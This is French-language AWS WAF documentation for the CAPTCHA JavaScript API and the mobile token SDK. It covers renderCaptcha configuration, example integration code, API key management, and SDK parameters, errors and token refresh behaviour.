# Spécification de l'API CAPTCHA JavaScript
<a name="waf-js-captcha-api-specification"></a>

Cette section répertorie les spécifications des méthodes et des propriétés du CAPTCHA JavaScript APIs. Utilisez le CAPTCHA JavaScript APIs pour exécuter des puzzles CAPTCHA personnalisés dans vos applications clientes. 

Cette API s'appuie sur la menace intelligente APIs, que vous utilisez pour configurer et gérer l'acquisition et l'utilisation de AWS WAF jetons. Voir[Spécification de l'API de menace intelligente](waf-js-challenge-api-specification.md).

**`AwsWafCaptcha.renderCaptcha(container, configuration)`**  
Présente un casse-tête AWS WAF CAPTCHA à l'utilisateur final et, en cas de succès, met à jour le jeton client avec la validation CAPTCHA. Ceci n'est disponible qu'avec l'intégration CAPTCHA. Utilisez cet appel ainsi que la menace intelligente APIs pour gérer la récupération des jetons et pour fournir le jeton dans vos `fetch` appels. Découvrez la menace intelligente APIs sur[Spécification de l'API de menace intelligente](waf-js-challenge-api-specification.md).  
Contrairement à l'interstitiel CAPTCHA qui AWS WAF envoie, le puzzle CAPTCHA rendu par cette méthode affiche le puzzle immédiatement, sans écran de titre initial.     
**`container`**  
L'`Element`objet de l'élément conteneur cible sur la page. Ceci est généralement récupéré en appelant `document.getElementById()` ou`document.querySelector()`.  
Obligatoire : oui  
Type : `Element`  
**configuration**  
Un objet contenant les paramètres de configuration CAPTCHA, comme suit : ****    
**`apiKey`**   
La clé API cryptée qui autorise les autorisations pour le domaine du client. Utilisez la AWS WAF console pour générer vos clés d'API pour les domaines de vos clients. Vous pouvez utiliser une clé pour un maximum de cinq domaines. Pour plus d'informations, consultez [Gestion des clés d'API pour l'API JS CAPTCHA](waf-js-captcha-api-key.md).   
Obligatoire : oui  
Type : `string`  
**`onSuccess: (wafToken: string) => void;`**   
Appelé avec un AWS WAF jeton valide lorsque l'utilisateur final termine avec succès un casse-tête CAPTCHA. Utilisez le jeton dans les demandes que vous envoyez aux points de terminaison que vous protégez à l'aide d'un pack de AWS WAF protection (ACL Web). Le jeton fournit la preuve et l'horodatage de la dernière réalisation réussie du puzzle.   
Obligatoire : oui  
**`onError?: (error: CaptchaError) => void;`**   
Appelé avec un objet d'erreur lorsqu'une erreur survient lors de l'opération CAPTCHA.   
Obligatoire : non  
**`CaptchaError`définition de classe** — Le `onError` gestionnaire fournit un type d'erreur avec la définition de classe suivante.   

```
CaptchaError extends Error {
    kind: "internal_error" | "network_error" | "token_error" | "client_error";
    statusCode?: number;
}
```
+ `kind`— Le type d'erreur renvoyé. 
+ `statusCode`— Le code d'état HTTP, s'il est disponible. Ceci est utilisé `network_error` si l'erreur est due à une erreur HTTP.  
**`onLoad?: () => void;`**   
Appelé lors du chargement d'un nouveau casse-tête CAPTCHA.  
Obligatoire : non  
**`onPuzzleTimeout?: () => void;`**   
Appelé lorsqu'un casse-tête CAPTCHA n'est pas terminé avant son expiration.  
Obligatoire : non  
**`onPuzzleCorrect?: () => void;`**   
Appelé lorsqu'une réponse correcte est fournie à un casse-tête CAPTCHA.  
Obligatoire : non  
**`onPuzzleIncorrect?: () => void;`**   
Appelé lorsqu'une réponse incorrecte est fournie à un casse-tête CAPTCHA.  
Obligatoire : non  
**`defaultLocale`**   
La localisation par défaut à utiliser pour le puzzle CAPTCHA. Les instructions écrites pour les puzzles CAPTCHA sont disponibles en arabe (ar-SA), chinois simplifié (zh-CN), néerlandais (nl-NL), anglais (en-US), français (fr-FR), allemand (de-DE), italien (it-IT), japonais (ja-JP), portugais brésilien (pT-BR), espagnol (es-ES) et turc (tr-TR). Les instructions audio sont disponibles pour toutes les langues écrites, à l'exception du chinois et du japonais, qui sont par défaut l'anglais. Pour modifier la langue par défaut, fournissez la langue internationale et le code local, par exemple,`ar-SA`.  
Par défaut : langue actuellement utilisée dans le navigateur de l'utilisateur final  
Obligatoire : non  
Type : `string`  
**`disableLanguageSelector`**   
S'il est défini sur`true`, le casse-tête CAPTCHA masque le sélecteur de langue.   
Par défaut: `false`  
Obligatoire : non  
Type : `boolean`  
**`dynamicWidth`**   
S'il est défini sur`true`, le puzzle CAPTCHA change de largeur pour être compatible avec la largeur de la fenêtre du navigateur.   
Par défaut: `false`  
Obligatoire : non  
Type : `boolean`  
**`skipTitle`**   
S'il est défini sur`true`, le casse-tête CAPTCHA n'affiche pas le titre du puzzle intitulé **Résoudre le** puzzle.   
Par défaut: `false`  
Obligatoire : non  
Type : `boolean`

# Comment afficher le casse-tête CAPTCHA
<a name="waf-js-captcha-api-render"></a>

Cette section fournit un exemple de `renderCaptcha` mise en œuvre.

Vous pouvez utiliser l' AWS WAF `renderCaptcha`appel où vous le souhaitez dans votre interface client. L'appel permet de récupérer un casse-tête CAPTCHA AWS WAF, de le restituer et d'envoyer les résultats à des fins de vérification. AWS WAF Lorsque vous passez l'appel, vous indiquez la configuration du rendu du puzzle et les rappels que vous souhaitez exécuter lorsque vos utilisateurs finaux auront terminé le puzzle. Pour plus de détails sur les options, reportez-vous à la section précédente,[Spécification de l'API CAPTCHA JavaScript](waf-js-captcha-api-specification.md).

Utilisez cet appel conjointement avec la fonctionnalité de gestion des jetons de l'intégration intelligente des menaces APIs. Cet appel fournit à votre client un jeton qui vérifie la réussite du casse-tête CAPTCHA. Utilisez l'intégration intelligente des menaces APIs pour gérer le jeton et pour fournir le jeton dans les appels de votre client aux points de terminaison protégés par des packs de AWS WAF protection (Web ACLs). Pour plus d'informations sur la menace intelligente APIs, consultez[Utilisation de l' JavaScript API de gestion intelligente des menaces](waf-js-challenge-api.md).

**Exemples d’implémentation**  
La liste d'exemples suivante montre une implémentation CAPTCHA standard, y compris le placement de l'URL d' AWS WAF intégration dans la `<head>` section. 

Cette liste configure la `renderCaptcha` fonction avec un rappel de réussite qui utilise le `AwsWafIntegration.fetch` wrapper de l'intégration intelligente des menaces. APIs Pour plus d'informations sur cette fonction, consultez[Comment utiliser le `fetch` wrapper d'intégration](waf-js-challenge-api-fetch-wrapper.md).

```
<head>
    <script type="text/javascript" src="<Integration URL>/jsapi.js" defer></script>
</head>

<script type="text/javascript">
    function showMyCaptcha() {
        var container = document.querySelector("#my-captcha-container");
        
        AwsWafCaptcha.renderCaptcha(container, {
            apiKey: "...API key goes here...",
            onSuccess: captchaExampleSuccessFunction,
            onError: captchaExampleErrorFunction,
            ...other configuration parameters as needed...
        });
    }
    
    function captchaExampleSuccessFunction(wafToken) {
        // Captcha completed. wafToken contains a valid WAF token. Store it for
        // use later or call AwsWafIntegration.fetch() to use it easily.
        // It will expire after a time, so calling AwsWafIntegration.getToken()
        // again is advised if the token is needed later on, outside of using the
        // fetch wrapper.
        
        // Use WAF token to access protected resources
        AwsWafIntegration.fetch("...WAF-protected URL...", {
            method: "POST",
            headers: {
                "Content-Type": "application/json",
            },
            body: "{ ... }" /* body content */
        });
    }
    
    function captchaExampleErrorFunction(error) {
        /* Do something with the error */
    }
</script>

<div id="my-captcha-container">
    <!-- The contents of this container will be replaced by the captcha widget -->
</div>
```

**Exemples de paramètres de configuration**  
L'exemple de liste suivant montre les `renderCaptcha` paramètres autres que ceux par défaut pour les options de largeur et de titre. 

```
        AwsWafCaptcha.renderCaptcha(container, {
            apiKey: "...API key goes here...",
            onSuccess: captchaExampleSuccessFunction,
            onError: captchaExampleErrorFunction,
            dynamicWidth: true, 
            skipTitle: true
        });
```

Pour obtenir des informations complètes sur les options de configuration, consultez[Spécification de l'API CAPTCHA JavaScript](waf-js-captcha-api-specification.md).

# Gestion d'une réponse CAPTCHA depuis AWS WAF
<a name="waf-js-captcha-api-conditional"></a>

Cette section fournit un exemple de gestion d'une réponse CAPTCHA.

Une AWS WAF règle comportant une CAPTCHA action met fin à l'évaluation d'une requête Web correspondante si celle-ci ne contient pas de jeton avec un horodatage CAPTCHA valide. Si la demande est un `GET` text/html appel, l'CAPTCHAaction fournit alors au client un interstitiel avec un casse-tête CAPTCHA. Lorsque vous n'intégrez pas l' JavaScript API CAPTCHA, l'interstitiel exécute le puzzle et, si l'utilisateur final le résout avec succès, soumet automatiquement à nouveau la demande. 

Lorsque vous intégrez l' JavaScript API CAPTCHA et que vous personnalisez votre gestion des CAPTCHA, vous devez détecter la réponse CAPTCHA finale, fournir votre CAPTCHA personnalisé, puis si l'utilisateur final résout le casse-tête avec succès, soumettre à nouveau la demande Web du client. 

L'exemple de code suivant montre comment procéder : 

**Note**  
La réponse à l' AWS WAF CAPTCHAaction possède un code d'état HTTP 405, que nous utilisons pour reconnaître la CAPTCHA réponse dans ce code. Si votre point de terminaison protégé utilise un code d'état HTTP 405 pour communiquer tout autre type de réponse pour le même appel, cet exemple de code affichera également un casse-tête CAPTCHA pour ces réponses. 

```
<!DOCTYPE html>
<html>
<head>
    <script type="text/javascript" src="<Integration URL>/jsapi.js" defer></script>
</head>
<body>
    <div id="my-captcha-box"></div>
    <div id="my-output-box"></div>

    <script type="text/javascript">
    async function loadData() {
        // Attempt to fetch a resource that's configured to trigger a CAPTCHA
        // action if the rule matches. The CAPTCHA response has status=HTTP 405.
        const result = await AwsWafIntegration.fetch("/protected-resource");

        // If the action was CAPTCHA, render the CAPTCHA and return

        // NOTE: If the endpoint you're calling in the fetch call responds with HTTP 405
        // as an expected response status code, then this check won't be able to tell the
        // difference between that and the CAPTCHA rule action response.

        if (result.status === 405) {
            const container = document.querySelector("#my-captcha-box");
            AwsWafCaptcha.renderCaptcha(container, {
                apiKey: "...API key goes here...",
                onSuccess() {
                    // Try loading again, now that there is a valid CAPTCHA token
                    loadData();
                },
            });
            return;
        }

        const container = document.querySelector("#my-output-box");
        const response = await result.text();
        container.innerHTML = response;
    }

    window.addEventListener("load", () => {
        loadData();
    });
    </script>
</body>
</html>
```

# Gestion des clés d'API pour l'API JS CAPTCHA
<a name="waf-js-captcha-api-key"></a>

Cette section fournit des instructions pour générer et supprimer des clés d'API.

Pour intégrer le AWS WAF CAPTCHA dans une application cliente avec l' JavaScript API, vous avez besoin de la balise d'intégration d' JavaScript API et de la clé d'API cryptée pour le domaine client dans lequel vous souhaitez exécuter votre puzzle CAPTCHA. 

L'intégration de l'application CAPTCHA JavaScript utilise les clés d'API cryptées pour vérifier que le domaine de l'application client est autorisé à utiliser l'API AWS WAF CAPTCHA. Lorsque vous appelez l'API CAPTCHA depuis votre JavaScript client, vous fournissez une clé d'API avec une liste de domaines qui inclut un domaine pour le client actuel. Vous pouvez répertorier jusqu'à 5 domaines dans une seule clé cryptée. 

**Exigences clés de l'API**  
La clé d'API que vous utilisez dans votre intégration CAPTCHA doit contenir un domaine qui s'applique au client sur lequel vous utilisez la clé. 
+ Si vous spécifiez un `window.awsWafCookieDomainList` dans l'intégration intelligente des menaces de votre client, au moins un domaine de votre clé d'API doit correspondre exactement à l'un des domaines de jetons `window.awsWafCookieDomainList` ou doit être le domaine apex de l'un de ces domaines de jetons. 

  Par exemple, pour le domaine de jeton`mySubdomain.myApex.com`, la clé `mySubdomain.myApex.com` d'API correspond exactement et la clé d'API `myApex.com` est le domaine apex. L'une ou l'autre des clés correspond au domaine du jeton. 

  Pour plus d'informations sur le paramétrage de la liste des domaines de jetons, consultez[Fournir des domaines à utiliser dans les jetons](waf-js-challenge-api-set-token-domain.md).
+ Dans le cas contraire, le domaine actuel doit être contenu dans la clé d'API. Le domaine actuel est celui que vous pouvez voir dans la barre d'adresse du navigateur. 

Les domaines que vous utilisez doivent être ceux qui AWS WAF seront acceptés, en fonction du domaine hôte protégé et de la liste de domaines de jetons configurée pour l'ACL Web. Pour de plus amples informations, veuillez consulter [AWS WAF configuration de la liste de domaines de jetons du pack de protection (ACL Web)](waf-tokens-domains.md#waf-tokens-domain-lists).

**Comment choisir la région pour votre clé d'API**  
AWS WAF peut générer des clés d'API CAPTCHA dans toutes les régions où elles AWS WAF sont disponibles. 

En règle générale, vous devez utiliser la même région pour votre clé d'API CAPTCHA que celle que vous utilisez pour votre pack de protection (ACL Web). Toutefois, si vous vous attendez à ce qu'un pack de protection régional (ACL Web) attire un public mondial, vous pouvez obtenir une balise d' JavaScript intégration CAPTCHA limitée CloudFront et une clé d'API limitée CloudFront, et les utiliser avec un pack de protection régional (ACL Web). Cette approche permet aux clients de charger un casse-tête CAPTCHA depuis la région la plus proche d'eux, ce qui réduit le temps de latence. 

Les clés d'API CAPTCHA qui sont limitées à des régions autres que ne CloudFront sont pas prises en charge pour une utilisation dans plusieurs régions. Ils ne peuvent être utilisés que dans la région à laquelle ils sont destinés. 

**Pour générer une clé d'API pour les domaines de vos clients**  
Pour obtenir l'URL d'intégration et générer et récupérer les clés d'API via la console. 

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le panneau de navigation, choisissez **Intégration d'applications**. 

1. Dans le volet des **packs de protection (Web ACLs) activés pour l'intégration des applications**, sélectionnez la région que vous souhaitez utiliser pour votre clé d'API. Vous pouvez également sélectionner la région dans le volet des **clés d'API** de l'onglet d'**intégration CAPTCHA**.

1. Choisissez l'onglet Intégration **CAPTCHA**. Cet onglet fournit la balise d' JavaScript intégration CAPTCHA, que vous pouvez utiliser dans votre intégration, ainsi que la liste des clés d'API. Les deux sont limités à la région sélectionnée.

1. Dans le volet **des clés d'API**, choisissez **Generate key**. Le dialogue de génération de clés apparaît. 

1. Entrez les domaines clients que vous souhaitez inclure dans la clé. Vous pouvez saisir jusqu'à 5. Lorsque vous avez terminé, choisissez **Generate key**. L'interface revient à l'onglet d'intégration CAPTCHA, où votre nouvelle clé est répertoriée. 

   Une fois créée, une clé d'API est immuable. Si vous devez apporter des modifications à une clé, générez une nouvelle clé et utilisez-la à la place. 

1. (Facultatif) Copiez la clé nouvellement générée pour l'utiliser dans votre intégration. 

Vous pouvez également utiliser le REST APIs ou l'un des langages spécifiques AWS SDKs pour ce travail. Les appels d'API REST sont [Create APIKey](https://docs.aws.amazon.com/waf/latest/APIReference/API_CreateAPIKey.html) et [List APIKeys](https://docs.aws.amazon.com/waf/latest/APIReference/API_ListAPIKeys.html). 

**Pour supprimer une clé d’API**  
Pour supprimer une clé d'API, vous devez utiliser l'API REST ou l'une des langues spécifiques AWS SDKs. L'appel de l'API REST est [Delete APIKey](https://docs.aws.amazon.com/waf/latest/APIReference/API_DeleteAPIKey.html). Vous ne pouvez pas utiliser la console pour supprimer une clé. 

Une fois que vous avez supprimé une clé, cela peut prendre jusqu' AWS WAF à 24 heures pour interdire son utilisation dans toutes les régions. 

# AWS WAF intégration d'applications mobiles
<a name="waf-mobile-sdk"></a>

Cette section aborde le sujet de l'utilisation du AWS WAF mobile SDKs pour implémenter l'intégration AWS WAF intelligente des menaces SDKs pour les applications mobiles et TV Android et iOS. Pour les applications TV, SDKs elles sont compatibles avec les principales plateformes de télévision intelligente, notamment Android TV et Apple TV.
+ Pour les applications mobiles et TV Android, elles SDKs fonctionnent pour l'API Android version 23 (Android version 6) et versions ultérieures. Pour plus d'informations sur les versions d'Android, consultez les [notes de mise à jour de SDK Platform](https://developer.android.com/tools/releases/platforms).
+ Pour les applications mobiles iOS, elles SDKs fonctionnent pour iOS version 13 et versions ultérieures. Pour plus d'informations sur les versions d'iOS, consultez les [notes de mise à jour pour iOS et iPadOS](https://developer.apple.com/documentation/ios-ipados-release-notes).
+ Pour les applications Apple TV, elles SDKs fonctionnent pour tvOS version 14 ou ultérieure. Pour plus d'informations sur les versions de tvOS, consultez les notes de [mise à jour de tvOS](https://developer.apple.com/documentation/tvos-release-notes).

Avec le AWS WAF SDK mobile, vous pouvez gérer l'autorisation des jetons et inclure les jetons dans les demandes que vous envoyez à vos ressources protégées. En utilisant le SDKs, vous vous assurez que ces appels de procédure à distance effectués par votre client contiennent un jeton valide. En outre, lorsque cette intégration est en place sur les pages de votre application, vous pouvez implémenter des règles d'atténuation dans votre pack de protection (ACL Web), telles que le blocage des demandes qui ne contiennent pas de jeton valide.

Pour accéder au mobile SDKs, contactez l'assistance via [Contact AWS](https://aws.amazon.com/contact-us).

**Note**  
Le AWS WAF mobile SDKs n'est pas disponible pour la personnalisation du CAPTCHA.

L'approche de base pour utiliser le SDK consiste à créer un fournisseur de jetons à l'aide d'un objet de configuration, puis à utiliser le fournisseur de jetons pour récupérer des AWS WAF jetons. Par défaut, le fournisseur de jetons inclut les jetons récupérés dans vos requêtes Web adressées à votre ressource protégée. 

Voici une liste partielle d'une implémentation du SDK, qui montre les principaux composants. Pour obtenir des exemples détaillés, consultez [Exemples de code pour le SDK AWS WAF mobile](waf-mobile-sdk-coding-examples.md).

------
#### [ iOS ]

```
let url: URL = URL(string: "protection pack (web ACL) integration URL")!
	let configuration = WAFConfiguration(applicationIntegrationUrl: url, domainName: "Domain name")
	let tokenProvider = WAFTokenProvider(configuration)
	let token = tokenProvider.getToken()
```

------
#### [ Android ]

```
URL applicationIntegrationURL = new URL("protection pack (web ACL) integration URL");
	String domainName = "Domain name";
	WAFConfiguration configuration = WAFConfiguration.builder().applicationIntegrationURL(applicationIntegrationURL).domainName(domainName).build();
	WAFTokenProvider tokenProvider = new WAFTokenProvider(Application context, configuration);
	WAFToken token = tokenProvider.getToken();
```

------

# Installation du SDK AWS WAF mobile
<a name="waf-mobile-sdk-installing"></a>

Cette section fournit des instructions pour installer le SDK AWS WAF mobile.

Pour accéder au mobile SDKs, contactez l'assistance via [Contact AWS](https://aws.amazon.com/contact-us).

Implémentez le SDK mobile d'abord dans un environnement de test, puis en production.

**Pour installer le SDK AWS WAF mobile**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le panneau de navigation, choisissez **Intégration d'applications**. 

1. Dans l'onglet **Intégrations intelligentes des menaces**, procédez comme suit : 

   1. Dans le volet **Packs de protection (Web ACLs) activés pour l'intégration des applications**, localisez le pack de protection (ACL Web) auquel vous souhaitez procéder à l'intégration. Copiez et enregistrez l'URL d'intégration du pack de protection (ACL Web) à utiliser dans votre implémentation. Vous pouvez également obtenir cette URL via l'appel d'API`GetWebACL`.

   1. Choisissez le type et la version de l'appareil mobile, puis choisissez **Télécharger**. Vous pouvez choisir la version de votre choix, mais nous vous recommandons d'utiliser la dernière version. AWS WAF télécharge le `zip` fichier pour votre appareil sur votre emplacement de téléchargement standard.

1. Dans l'environnement de développement de votre application, décompressez le fichier sur l'emplacement de travail de votre choix. Dans le répertoire de premier niveau du fichier zip, recherchez et ouvrez le`README`. Suivez les instructions du `README` fichier pour installer le SDK AWS WAF mobile à utiliser dans le code de votre application mobile. 

1. Programmez votre application conformément aux instructions des sections suivantes.

# AWS WAF spécification du SDK mobile
<a name="waf-mobile-sdk-specification"></a>

Cette section répertorie les objets du SDK, les opérations et les paramètres de configuration de la dernière version disponible du SDK AWS WAF mobile. Pour des informations détaillées sur le fonctionnement du fournisseur de jetons et des opérations pour les différentes combinaisons de paramètres de configuration, consultez[Fonctionnement du SDK AWS WAF mobile](waf-mobile-sdk-how-it-works.md). 

**`WAFToken`**  
Détient un AWS WAF jeton.    
**`getValue()`**  
Récupère la `String` représentation du. `WAFToken` 

**`WAFTokenProvider`**  
Gère les jetons dans votre application mobile. Implémentez cela à l'aide d'un `WAFConfiguration` objet.    
**`getToken()`**  
Si l'actualisation en arrière-plan est activée, le jeton mis en cache est renvoyé. Si l'actualisation en arrière-plan est désactivée, un appel synchrone bloquant est lancé AWS WAF pour récupérer un nouveau jeton.   
**`loadTokenIntoProvider(WAFToken)`**  
Charge le jeton spécifié dans le`WAFTokenProvider`, en remplaçant tout jeton géré par le fournisseur. Le fournisseur de jetons s'approprie le nouveau jeton et s'occupe de son actualisation à l'avenir. Cette opération met également à jour le jeton dans le magasin de cookies, s'`setTokenCookie`il est activé dans le`WAFConfiguration`.  
**`onTokenReady(WAFTokenResultCallback)`**  
Demande au fournisseur de jetons d'actualiser le jeton et d'invoquer le rappel fourni lorsqu'un jeton actif est prêt. Le fournisseur de jetons invoquera votre rappel dans un fil d'arrière-plan lorsque le jeton sera mis en cache et prêt. Appelez cela lorsque votre application se charge pour la première fois et également lorsqu'elle revient à un état actif. Pour plus d'informations sur le retour à un état actif, consultez[Récupération d'un jeton suite à l'inactivité d'une application](waf-mobile-sdk-how-it-works.md#waf-mobile-sdk-how-back-from-inactive).   
Pour les applications Android ou iOS, vous pouvez `WAFTokenResultCallback` définir l'opération que vous souhaitez que le fournisseur de jetons appelle lorsqu'un jeton demandé est prêt. Votre implémentation de `WAFTokenResultCallback` doit prendre les paramètres`WAFToken`,`SdkError`. Pour les applications iOS, vous pouvez également créer une fonction intégrée.   
**`storeTokenInCookieStorage(WAFToken)`**  
Indique au `WAFTokenProvider` de stocker le AWS WAF jeton spécifié dans le gestionnaire de cookies du SDK. Par défaut, le jeton n'est ajouté au magasin de cookies que lorsqu'il est acquis pour la première fois et lorsqu'il est actualisé. Si l'application efface le magasin de cookies partagé pour une raison quelconque, le SDK n'ajoute pas automatiquement le AWS WAF jeton avant la prochaine actualisation. 

**`WAFConfiguration`**  
Détient la configuration pour la mise en œuvre du`WAFTokenProvider`. Lorsque vous implémentez cela, vous fournissez l'URL d'intégration de votre pack de protection (ACL Web), le nom de domaine à utiliser dans le jeton et tous les paramètres autres que ceux par défaut que vous souhaitez que le fournisseur de jetons utilise.   
La liste suivante indique les paramètres de configuration que vous pouvez gérer dans l'`WAFConfiguration`objet.    
**`applicationIntegrationUrl`**   
URL d'intégration de l'application. Obtenez-le depuis la AWS WAF console ou via l'appel `getWebACL` d'API.  
Obligatoire : oui  
Type : URL spécifique à l'application. Pour iOS, voir [URL iOS](https://developer.apple.com/documentation/foundation/url). Pour Android, consultez l'URL [java.net.](https://docs.oracle.com/javase/7/docs/api/java/net/URL.html)   
**`backgroundRefreshEnabled`**   
Indique si vous souhaitez que le fournisseur de jetons actualise le jeton en arrière-plan. Si vous définissez cette option, le fournisseur de jetons actualise vos jetons en arrière-plan conformément aux paramètres de configuration qui régissent les activités d'actualisation automatique des jetons.   
Obligatoire : non  
Type : `Boolean`  
Valeur par défaut : `TRUE`  
**`domainName`**   
Le domaine à utiliser dans le jeton, qui est utilisé pour l'acquisition de jetons et le stockage des cookies. Par exemple, `example.com` ou `aws.amazon.com`. Il s'agit généralement du domaine hôte de votre ressource associé au pack de protection (ACL Web), dans lequel vous allez envoyer des requêtes Web. Pour le groupe de règles géré par l'ACFP`AWSManagedRulesACFPRuleSet`, il s'agit généralement d'un domaine unique correspondant au domaine indiqué dans le chemin de création de compte que vous avez indiqué dans la configuration du groupe de règles. Pour le groupe de règles géré par ATP`AWSManagedRulesATPRuleSet`, il s'agit généralement d'un domaine unique correspondant au domaine indiqué dans le chemin de connexion que vous avez indiqué dans la configuration du groupe de règles.   
Les suffixes publics ne sont pas autorisés. Par exemple, vous ne pouvez pas utiliser `gov.au` ou `co.uk` comme domaine de jeton.  
Le domaine doit être accepté, en fonction du domaine hôte protégé et de la liste des domaines de jetons du pack de protection (ACL Web). AWS WAF Pour de plus amples informations, veuillez consulter [AWS WAF configuration de la liste de domaines de jetons du pack de protection (ACL Web)](waf-tokens-domains.md#waf-tokens-domain-lists).  
Obligatoire : oui  
Type : `String`   
**`maxErrorTokenRefreshDelayMsec`**   
Durée maximale en millisecondes d'attente avant de répéter l'actualisation d'un jeton après une tentative infructueuse. Pour chaque nouvelle tentative automatique suite à une tentative infructueuse, cela ajoutera un retard exponentiel jusqu'au délai d'entrée indiqué. Cette valeur est utilisée après l'échec de la récupération du jeton et après plusieurs tentatives`maxRetryCount`.   
Obligatoire : non  
Type : `Integer`  
Valeur par défaut : `5000` (5 secondes)  
Valeur minimale autorisée : `1` (1 milliseconde)  
Valeur maximale autorisée : `30000` (30 secondes)  
**`maxRetryCount`**   
Nombre maximal de tentatives à effectuer avec un retard exponentiel lorsqu'un jeton est demandé.   
Obligatoire : non  
Type : `Integer`  
Valeur par défaut : `Infinity`  
Valeur minimale autorisée : `0`  
Valeur maximale autorisée : `100`  
**`setTokenCookie`**   
Indique si vous souhaitez que le gestionnaire de cookies du SDK ajoute un cookie jeton dans les demandes et dans d'autres domaines.   
Avec une `TRUE` valeur :   
+ Le gestionnaire de cookies ajoute un cookie jeton à toutes les demandes dont le chemin est inférieur au chemin spécifié dans`tokenCookiePath`. 
+ L'`WAFTokenProvider`opération `loadTokenIntoProvider()` met à jour le jeton dans le magasin de cookies, en plus de le charger dans le fournisseur de jetons.
Obligatoire : non  
Type : `Boolean`  
Valeur par défaut : `TRUE`  
**`tokenCookiePath`**   
Utilisé quand `setTokenCookie` c'est le cas`TRUE`. Indique le chemin de niveau supérieur où vous souhaitez que le gestionnaire de cookies du SDK ajoute un cookie jeton. Le gestionnaire ajoute un cookie symbolique à toutes les demandes que vous envoyez à ce chemin et à tous les chemins enfants.   
Par exemple, si vous définissez ce paramètre sur`/web/login`, le gestionnaire inclut le cookie jeton pour tout ce qui est envoyé `/web/login` et pour tous ses chemins enfants, par exemple`/web/login/help`. Il n'inclut pas le jeton pour les demandes envoyées vers d'autres chemins`/`, comme`/web`, ou`/web/order`.   
Obligatoire : non  
Type : `String`  
Valeur par défaut : `/`  
**`tokenRefreshDelaySec`**   
Utilisé pour rafraîchir l'arrière-plan. Durée maximale en secondes entre les actualisations du jeton d'arrière-plan.  
Obligatoire : non  
Type : `Integer`  
Valeur par défaut : `88`  
Valeur minimale autorisée : `88`  
Valeur maximale autorisée : `300` (5 minutes)

## AWS WAF erreurs du SDK mobile
<a name="waf-mobile-sdk-errors"></a>

Cette section répertorie les erreurs possibles pour la version actuelle du SDK AWS WAF mobile.

**`SdkError`**  
Type d'erreur renvoyé lorsque vous ne parvenez pas à récupérer un jeton. Les SDK Android et iOS présentent les mêmes types d'erreurs.  
Le SDK AWS WAF mobile présente les types d'erreur suivants :    
**`invalidChallenge`**  
Cette erreur est renvoyée lorsque le serveur de jetons renvoie des données de défi non valides ou lorsque le blob de réponse est muté par un attaquant.  
**`errorInvokingGetChallengeEndpoint`**  
Cette erreur est renvoyée lorsque le serveur de jetons renvoie un code de réponse infructueux au client ou lorsqu'une erreur réseau se produit.  
**`invalidVerifyChallengeResponse`**  
Cette erreur est renvoyée en cas d'erreur lors de la récupération `aws-waf-token` de la réponse de vérification AWS WAF du serveur ou lorsque la réponse du serveur a été falsifiée.  
**`errorInvokingVerifyEndpoint`**  
Cette erreur est renvoyée lorsque le client reçoit une mauvaise réponse du AWS WAF serveur ou une erreur réseau lors de la vérification du défi résolu.  
**`internalError`**  
Cette erreur est renvoyée pour toutes les autres erreurs susceptibles de se produire dans le SDK lui-même.

**`socketTimeoutException`**  
Cette erreur est souvent renvoyée en cas d'erreur réseau lors de la récupération du jeton.  
Cette erreur peut être due à ce qui suit :  
+ Faible bande passante réseau : confirmez vos paramètres de connectivité réseau
+ URL d'intégration de l'application modifiée : vérifiez que l'URL d'intégration n'est pas modifiée par rapport à ce qui apparaît sur la console AWS WAF 

# Fonctionnement du SDK AWS WAF mobile
<a name="waf-mobile-sdk-how-it-works"></a>

Cette section explique comment les classes, les propriétés et les opérations du SDK AWS WAF mobile fonctionnent ensemble.

Le mobile vous SDKs fournit un fournisseur de jetons configurable que vous pouvez utiliser pour récupérer et utiliser des jetons. Le fournisseur de jetons vérifie que les demandes que vous autorisez proviennent de clients légitimes. Lorsque vous envoyez des demandes aux AWS ressources que vous protégez AWS WAF, vous incluez le jeton dans un cookie afin de valider la demande. Vous pouvez gérer le cookie de jeton manuellement ou demander au fournisseur de jetons de le faire pour vous.

Cette section couvre les interactions entre les classes, les propriétés et les méthodes incluses dans le SDK mobile. Pour les spécifications du SDK, voir[AWS WAF spécification du SDK mobile](waf-mobile-sdk-specification.md). 

## Récupération et mise en cache des jetons
<a name="waf-mobile-sdk-how-token-basics"></a>

Lorsque vous créez l'instance du fournisseur de jetons dans votre application mobile, vous configurez la manière dont vous souhaitez qu'elle gère les jetons et leur récupération. Votre principal choix est de savoir comment conserver des jetons valides et non expirés à utiliser dans les requêtes Web de votre application :
+ **Actualisation de l'arrière-plan activée** : il s'agit de la valeur par défaut. Le fournisseur de jetons actualise automatiquement le jeton en arrière-plan et le met en cache. Lorsque l'actualisation en arrière-plan est activée, lorsque vous appelez`getToken()`, l'opération récupère le jeton mis en cache. 

  Le fournisseur de jetons effectue l'actualisation du jeton à des intervalles configurables, de sorte qu'un jeton non expiré soit toujours disponible dans le cache lorsque l'application est active. L'actualisation en arrière-plan est suspendue lorsque votre application est inactive. Pour plus d'informations à ce sujet, consultez[Récupération d'un jeton suite à l'inactivité d'une application](#waf-mobile-sdk-how-back-from-inactive).
+ **Actualisation en arrière-plan désactivée** : vous pouvez désactiver l'actualisation des jetons en arrière-plan, puis récupérer les jetons uniquement sur demande. Les jetons récupérés à la demande ne sont pas mis en cache et vous pouvez en récupérer plusieurs si vous le souhaitez. Chaque jeton est indépendant des autres que vous récupérez, et chacun possède son propre horodatage utilisé pour calculer l'expiration.

  Les options suivantes s'offrent à vous pour récupérer les jetons lorsque l'actualisation en arrière-plan est désactivée : 
  + **`getToken()`**— Lorsque vous appelez alors que l'actualisation `getToken()` en arrière-plan est désactivée, l'appel récupère de manière synchrone un nouveau jeton depuis. AWS WAF Il s'agit d'un appel potentiellement bloquant qui peut affecter la réactivité de l'application si vous l'invoquez sur le thread principal. 
  + **`onTokenReady(WAFTokenResultCallback)`**— Cet appel récupère un nouveau jeton de manière asynchrone, puis invoque le rappel du résultat fourni dans un thread d'arrière-plan lorsqu'un jeton est prêt. 

